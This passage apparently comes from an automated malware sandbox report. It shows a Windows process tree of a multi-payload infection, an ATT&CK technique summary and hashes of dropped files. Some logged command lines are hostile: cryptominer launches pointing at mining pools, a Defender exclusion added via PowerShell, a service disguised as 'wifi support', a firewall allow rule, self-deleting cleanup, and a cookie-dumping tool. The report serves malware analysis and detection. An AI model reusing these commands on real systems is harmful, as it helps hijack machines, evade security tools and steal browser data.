                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:5312
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yl2dey0i.hjp\6d3ab8a7.exe & exit
                                                                                                          6⤵
                                                                                                            PID:3736
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\yl2dey0i.hjp\6d3ab8a7.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\yl2dey0i.hjp\6d3ab8a7.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:5712
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies system certificate store
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4188
                                                                                                    • C:\Users\Admin\AppData\Roaming\8B3E.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\8B3E.tmp.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5344
                                                                                                      • C:\Users\Admin\AppData\Roaming\8B3E.tmp.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\8B3E.tmp.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5160
                                                                                                    • C:\Users\Admin\AppData\Roaming\8FA4.tmp.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\8FA4.tmp.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5480
                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w286@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                        4⤵
                                                                                                          PID:5936
                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w6245 --cpu-max-threads-hint 50 -r 9999
                                                                                                          4⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          PID:5068
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                        3⤵
                                                                                                          PID:5720
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1
                                                                                                            4⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:4656
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks whether UAC is enabled
                                                                                                        PID:5960
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1572
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1900
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4780
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          3⤵
                                                                                                            PID:1476
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            3⤵
                                                                                                              PID:4508
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                          1⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:640
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            2⤵
                                                                                                            • Checks processor information in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:1408
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:4496
                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          PID:4540
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2228
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                          • Modifies Internet Explorer settings
                                                                                                          • Modifies registry class
                                                                                                          PID:4676
                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                          1⤵
                                                                                                            PID:5804
                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                            1⤵
                                                                                                            • Modifies registry class
                                                                                                            PID:5416
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                            1⤵
                                                                                                              PID:3736
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BF25.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\BF25.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6084
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C65A.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\C65A.exe
                                                                                                              1⤵
                                                                                                                PID:5272
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CC95.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\CC95.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops startup file
                                                                                                                • NTFS ADS
                                                                                                                PID:4376
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D197.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\D197.exe
                                                                                                                1⤵
                                                                                                                  PID:4592
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D419.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D419.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:3980
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D419.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\D419.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Adds Run key to start application
                                                                                                                    PID:4760
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                  1⤵
                                                                                                                    PID:4564
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E040.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E040.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4700
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kernal.dll
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\kernal.dll" -s -pdfgdfxvhbdgvhfgjvhdgjhgdvhnrfgjvhtdfhgjhfh
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4732
                                                                                                                      • C:\Users\Admin\AppData\Roaming\svchoct.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\svchoct.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5484
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 292
                                                                                                                          4⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Program crash
                                                                                                                          PID:5264
                                                                                                                      • C:\Users\Admin\AppData\Roaming\system.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\system.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4652
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E591.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E591.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5936
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E95A.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E95A.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:6132
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      2⤵
                                                                                                                        PID:3776
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F07F.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F07F.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5508
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F255.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F255.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Windows security modification
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:5408
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\75234b95-e3ea-4a9f-9237-4423d2f8fde0\AdvancedRun.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\75234b95-e3ea-4a9f-9237-4423d2f8fde0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\75234b95-e3ea-4a9f-9237-4423d2f8fde0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                        2⤵
                                                                                                                          PID:5592
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\75234b95-e3ea-4a9f-9237-4423d2f8fde0\AdvancedRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\75234b95-e3ea-4a9f-9237-4423d2f8fde0\AdvancedRun.exe" /SpecialRun 4101d8 5592
                                                                                                                            3⤵
                                                                                                                              PID:4824
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\F255.exe" -Force
                                                                                                                            2⤵
                                                                                                                              PID:5424
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F255.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\F255.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4620
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F255.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\F255.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:5272
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4640
                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                              C:\Windows\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:4164
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5932
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FFA4.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\FFA4.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:4872
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im FFA4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FFA4.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    2⤵
                                                                                                                                      PID:4356
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im FFA4.exe /f
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4920
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        3⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5968
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:4956
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:3520
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:5060
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\90C.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\90C.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      PID:4596
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 90C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\90C.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5592
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im 90C.exe /f
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:4564
                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                          timeout /t 6
                                                                                                                                          3⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:4192
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5588
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:4580
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1283.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1283.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:5036
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uralvamp\
                                                                                                                                          2⤵
                                                                                                                                            PID:3964
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              3⤵
                                                                                                                                                PID:4640
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nzymxhpj.exe" C:\Windows\SysWOW64\uralvamp\
                                                                                                                                              2⤵
                                                                                                                                                PID:4272
                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                "C:\Windows\System32\sc.exe" create uralvamp binPath= "C:\Windows\SysWOW64\uralvamp\nzymxhpj.exe /d\"C:\Users\Admin\AppData\Local\Temp\1283.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                2⤵
                                                                                                                                                  PID:1792
                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                  "C:\Windows\System32\sc.exe" description uralvamp "wifi internet conection"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4448
                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    "C:\Windows\System32\sc.exe" start uralvamp
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4824
                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2632
                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4808
                                                                                                                                                  • C:\Windows\SysWOW64\uralvamp\nzymxhpj.exe
                                                                                                                                                    C:\Windows\SysWOW64\uralvamp\nzymxhpj.exe /d"C:\Users\Admin\AppData\Local\Temp\1283.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:5296
                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      svchost.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:5840
                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                        svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4124
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4200
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4888
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5424
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:4824
                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            PID:5460
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:3532
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:2220

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                          Persistence

                                                                                                                                                          New Service

                                                                                                                                                          1
                                                                                                                                                          T1050

                                                                                                                                                          Modify Existing Service

                                                                                                                                                          1
                                                                                                                                                          T1031

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          2
                                                                                                                                                          T1060

                                                                                                                                                          BITS Jobs

                                                                                                                                                          1
                                                                                                                                                          T1197

                                                                                                                                                          Privilege Escalation

                                                                                                                                                          New Service

                                                                                                                                                          1
                                                                                                                                                          T1050

                                                                                                                                                          Defense Evasion

                                                                                                                                                          Disabling Security Tools

                                                                                                                                                          3
                                                                                                                                                          T1089

                                                                                                                                                          Modify Registry

                                                                                                                                                          7
                                                                                                                                                          T1112

                                                                                                                                                          BITS Jobs

                                                                                                                                                          1
                                                                                                                                                          T1197

                                                                                                                                                          Install Root Certificate

                                                                                                                                                          1
                                                                                                                                                          T1130

                                                                                                                                                          Credential Access

                                                                                                                                                          Credentials in Files

                                                                                                                                                          5
                                                                                                                                                          T1081

                                                                                                                                                          Discovery

                                                                                                                                                          Software Discovery

                                                                                                                                                          1
                                                                                                                                                          T1518

                                                                                                                                                          Query Registry

                                                                                                                                                          4
                                                                                                                                                          T1012

                                                                                                                                                          System Information Discovery

                                                                                                                                                          5
                                                                                                                                                          T1082

                                                                                                                                                          Security Software Discovery

                                                                                                                                                          1
                                                                                                                                                          T1063

                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                          1
                                                                                                                                                          T1120

                                                                                                                                                          Remote System Discovery

                                                                                                                                                          1
                                                                                                                                                          T1018

                                                                                                                                                          Collection

                                                                                                                                                          Data from Local System

                                                                                                                                                          5
                                                                                                                                                          T1005

                                                                                                                                                          Command and Control

                                                                                                                                                          Web Service

                                                                                                                                                          1
                                                                                                                                                          T1102

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                            MD5

                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                            SHA1

                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                            SHA256

                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                            SHA512

                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                            MD5

                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                            SHA1

                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                            SHA256

                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                            SHA512

                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                          • C:\Program Files\Internet Explorer\PKKBRJLBQM\ultramediaburner.exe
                                                                                                                                                            MD5

                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                            SHA1

                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                            SHA256

                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                            SHA512

                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                          • C:\Program Files\Internet Explorer\PKKBRJLBQM\ultramediaburner.exe
                                                                                                                                                            MD5

                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                            SHA1

                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                            SHA256

                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                            SHA512

                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                          • C:\Program Files\install.dat
                                                                                                                                                            MD5

                                                                                                                                                            806c3221a013fec9530762750556c332

                                                                                                                                                            SHA1

                                                                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                            SHA256

                                                                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                            SHA512

                                                                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                          • C:\Program Files\install.dat
                                                                                                                                                            MD5

                                                                                                                                                            bef5c483c6eba257020201190666e28d

                                                                                                                                                            SHA1

                                                                                                                                                            e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                                                                                                                            SHA256

                                                                                                                                                            d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                                                                                                                            SHA512

